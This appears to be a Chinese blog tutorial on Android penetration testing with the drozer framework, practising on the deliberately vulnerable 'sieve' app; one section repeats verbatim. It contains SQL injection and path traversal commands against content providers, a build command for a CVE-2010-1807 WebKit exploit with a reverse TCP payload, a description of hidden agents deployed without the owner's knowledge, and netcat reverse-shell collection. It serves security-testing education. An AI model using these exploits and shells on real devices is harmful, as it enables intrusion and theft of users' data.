0x00 前言
Drozer是MWR Labs开发的一款Android安全测试框架。是目前最好的Android安全测试工具之一。其官方文档说道:“Drozer允许你一一个普通android应用的身份与其他应用和操作系统交互。”在Web世界已经有了许多安全测试工具了,我们只需要给出一个目标,这些工具就会自动为我们安全测试报告。但Drozer与这样的自动化扫描器不同,Drozer是一种交互式的安全测试工具。使用Drozer进行安全测试,用户在自己的工作站上输入命令,Drozer会将命令发送到Android设备上的代理程序执行。其官方文档说道:“Drozer允许你一一个普通android应用的身份与其他应用和操作系统交互。”
0x01 环境准备
1 手机获得root权限。至于root的方法,每台手机都不同,本人推荐kingroot。
2 adb.exe。至于这个是在可以在eclipse 中找到,或者各种手机驱动,如果电脑无法识别你的识别,证明是驱动问题,请自行安装适合你手机的驱动。
3 手机usb连接开启debug模式(在设置>关于手机>连续点击多次版本号,即可开启开发者模式)。这个是一般步骤,现在不同厂商的UI不同。请参考你的手机使用说明书。
4 集成环境android测试环境--Appie, 安装方法自行百度。比较简单就不详细说明了。或者Window下安装drozer
5 安装完drozer后在其目录下把agent.apk安装到手机。如果找不到安装包,可手动安装:https://github.com/ym2011/Android-Penetration
6 安装WebContentResolver.apk。如果找不到安装包,可手动安装:https://github.com/ym2011/Android-Penetration
0x02 连接准备
1 确认手机驱动安装成功。
D:\Appie
$ drozer console devices
2 手机端开启转发
3 电脑端开启转发
D:\Appie
$ adb forward tcp:31415 tcp:31415
$ drozer console connect
4 启动WebContentResolver.apk应用程序(可选)
在本地电脑中用Web界面访问url格式如下
http://localhost:8080/query?a=providers&path0=Parameter1&path1=Parameter2&pathn=parametern&selName=column&selId=id
解释: providers:为content://后第一个参数比如records Parameter1:为第二个参数operations Parameter2..parametern:为后门的依次类推的参数,如果后面有这么多参数 Column:表字段例如上面字段<_id> Id:为字段数据
注意:格式必须是这样,selName、selId这两个参数第二个单词是大写的。
adb forward tcp:8080 tcp:8080 // 此时在本地主机浏览器输入http://localhost:8080即可访问Web界面
此处以content://settings/bookmarks/为例,在地址栏输入
http://localhost:8080/query?a=settings&path0=system&selName=_id&selId=5
sqlmap -u http://localhost:8080/query?a=settings&path0=system&selName=_id&selId=5
6 其他事项
如果启动失败,请重新按照上述步骤重试。如果端口被占用,请把端口31415 更改成其他端口,例如311200。或者注销windows或者重启。
如果是linux环境,方法是同理的,注销进程或者重启虚拟机。
root@kali:~/test#ps -ax|grep adb
root@kali:~/test# kill -9 7245
root@kali:~/test# adb start-server
0x03 安全测试
1 使用帮助信息
dz> list #查看所有可以使用的模块。例如后面可以结合run命令使用,run app.package.list
dz> help #查看所有可以使用的命令。
help COMMAND例如 help run # 可以查看run 命令的使用说明;
help MODULE,例如 help tools.file.upload 可以查看tools.file.upload模块的使用说明
run app.package.list --help # 可以查看某个模块的具体使用。
# 这里的帮助文档非常有用,因为命令和模块那么多,要熟练记住这些,并不容易。我们在做测试时,也无需记住这么多命令,只需善于利用帮助文档信息即可。
2 获取信息
dz> run app.package.list --help
dz> run app.package.list -f sieve
dz> run app.package.info -a com.mwr.example.sieve
3 寻找攻击向量
dz> run app.package.attacksurface com.mwr.example.sieve
4 启动app的
dz> run app.activity.info -a com.mwr.example.sieve
dz> help app.activity.start
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
5 读取content provider
dz> run app.provider.info -a com.mwr.example.sieve
3.5.1 Database-backed Content Providers (Data Leakage)
dz> run scanner.provider.finduris -a com.mwr.example.sieve
# 对于content provider,
我们可以使用dexdump 或者dexploer 直接在手机进行查看
或者我们可以在电脑逆向该apk,查看manifest.xml文件
或者在kali-linux 里面执行下列语句
root@kali:~/test# mkdir sieve
root@kali:~/test# apktool d /root/test/sieve.apk /root/test/sieve/
root@kali:~/test# grep -Eir "com.mwr.example.sieve.DBContentProvider" sieve|grep "content:"
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
3.5.2 Database-backed Content Providers (SQL Injection)
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
3.5.3 File System-backed Content Providers
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /root/test/database.db
3.5.4 Content Provider Vulnerabilities
dz> run scanner.provider.injection -a com.mwr.example.sieve
dz> run scanner.provider.traversal -a com.mwr.example.sieve
3.5.2 Database-backed Content Providers (SQL Injection)
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
3.5.3 File System-backed Content Providers
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /root/test/database.db
3.5.4 Content Provider Vulnerabilities
dz> run scanner.provider.injection -a com.mwr.example.sieve
dz> run scanner.provider.traversal -a com.mwr.example.sieve
3.6 Interacting with Services
dz> run app.service.info -a com.mwr.example.sieve
3.7 Other Modules
drozer provides a number of other modules that are useful during security assessments:
shell.start Start an interactive Linux shell on the device.
tools.file.upload / tools.file.download Allow files to be copied to/from the Android device.
tools.setup.busybox / tools.setup.minimalsu Install useful binaries on the device.
4. Exploitation Features in drozer
4.1 Infrastructure Mode
4.1.1 Running a drozer Server
myserver@kali:~/test#$ drozer server start
4.1.2 Connecting an Agent
To cause your agent to connect to the server, you must add its details as an ‘Endpoint’. On the device:
1. Start the drozer Agent, press the menu button, and choose ‘Settings’.
2. Select ‘New Endpoint’.
3. Set the ‘Host’ to the hostname or IP address of your server.
4. Set the ‘Port’ to the port your server is running on, unless it is the standard
5. Press ‘Save’ (you may need to press the menu button on older devices).
If you navigate back to the main screen, you should see your endpoint under the drozer logo. Select it and enable it in the same way as you would start the embedded server.
4.1.3 Connecting a Console
You are now ready to connect your console to the server.
First, you will need to check which, if any, devices are connected:
root@kali:~/test# drozer console devices --server myserver:31415
#Where “myserver” is the hostname or IP address of your drozer server.
This shows that we have two devices connected, running different version of Jellybean. You can specify which to use by giving its Device ID when starting the console:
root@kali:~/test# drozer console connect 67dcdbacd1ea6b60 –-server myserver:31415
dz>
4.1.4 drozer Server and Exploitation
The drozer server is crucial for exploitation because it acts as many servers in one:
drozerp if a drozer agent connects, it uses drozer’s custom binary protocol
http if a web browser connects, it serves resources over HTTP
bytestream if a particular byte is sent at the beginning of a transmission, it streams a resource in response
shell server if an ‘S’ (0x53) is sent as the first byte, the connection is cached as a bind shell
drozer makes use of this server throughout exploitation to host the resources required to successfully complete the exploit and deploy an agent to a device and to receive connections from compromised devices.
4.2 Exploits
root@kali:~# drozer exploit list
root@kali:~# drozer payload list
Putting this together, we can build an exploit for CVE-2010-1807, that uses weasel (MWR’s advanced payload) to gain a foothold on an old Android 2.1 device:
root@kali:~# drozer exploit build exploit.remote.webkit.nanparse –-payload weasel.reverse_tcp.armeabi --server 10.0.2.2:31415 --push-server 127.0.0.1:31415 --resource /home.html
root@kali:~# drozer console devices
4.3 weasel
In Section 4.2, we saw how weasel was able to deploy a lightweight agent onto a vulnerable device.
weasel is drozer’s advanced payload to automatically gain maximum leverage on a compromised device.
Here’s what happens:
1. The vulnerable device is exploited (in some way).
2. The exploit runs shell code that establishes a reverse TCP shell connection to the drozer server.
3. The payload sends a ‘W’ (0x57) to the drozer server to indicate that it would like the weasel stager sequence to be executed.
4. The drozer server delivers shell commands to install and start weasel.
5. weasel tries a number of techniques to run a drozer agent.
Depending on what weasel was able to do to escalate privileges, you will receive a connection from either a full agent, a limited agent or just a normal reverse shell.
4.3.1 Full Agent
If weasel was able to install a package, you will receive a connection from a full drozer agent. This is identical to the agent that you will have been using so far, but does not display a GUI to the device’s owner.
4.3.2 Limited Agent
If weasel was not able to install a package, it may still be able to run a version of the drozer agent. This is the full agent, but does not have access to any ‘Application Context’. This prevents it from interacting directly with parts of the runtime, such as the Package Manager so you cannot interact with other packages or their IPC endpoints. If you are given a limited agent, drozer will automatically hide the modules it is unable to run from the ‘list’ command.
4.3.3 Reverse Shell
If drozer was not able to execute even a limited agent, it will provide a normal Linux shell to the drozer server. You can collect these shells by connecting to the server with netcat, and sending a single line that says ‘COLLECT’:
$ nc myserver 31415
COLLECT
5. Installing Modules
5.1 Finding Modules
dz> module search root
dz> module search cmdclient -d
5.2 Installing Modules
dz> module install cmdclient
0x04 概要流程
adb forward tcp:31415 tcp:31415
drozer console connect
Retrieving package information
run app.package.list -f [app name]
run app.package.info -a [package name]
Identifying the attack surface
run app.package.attacksurface [package name]
Exploiting Activities
run app.activity.info -a [package name] -u
run app.activity.start --component [package name] [component name]
Exploiting Content Provider
run app.provider.info -a [package name]
run scanner.provider.finduris -a [package name]
run app.provider.query [uri]
run app.provider.update [uri] --selection [conditions] [selection arg] [column] [data]
run scanner.provider.sqltables -a [package name]
run scanner.provider.injection -a [package name]
run scanner.provider.traversal -a [package name]
Exploiting Broadcast Receivers
run app.broadcast.info -a [package name]
run app.broadcast.send --component [package name] [component name] --extra [type] [key] [value]
run app.broadcast.sniff --action [action]
Exploiting Service
run app.service.info -a [package name]
run app.service.start --action [action] --component [package name] [component name]
run app.service.send [package name] [component name] --msg [what] [arg1] [arg2] --extra [type] [key] [value] --bundle-as-obj
欢迎大家分享更好的思路,热切期待^^_^^
238
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
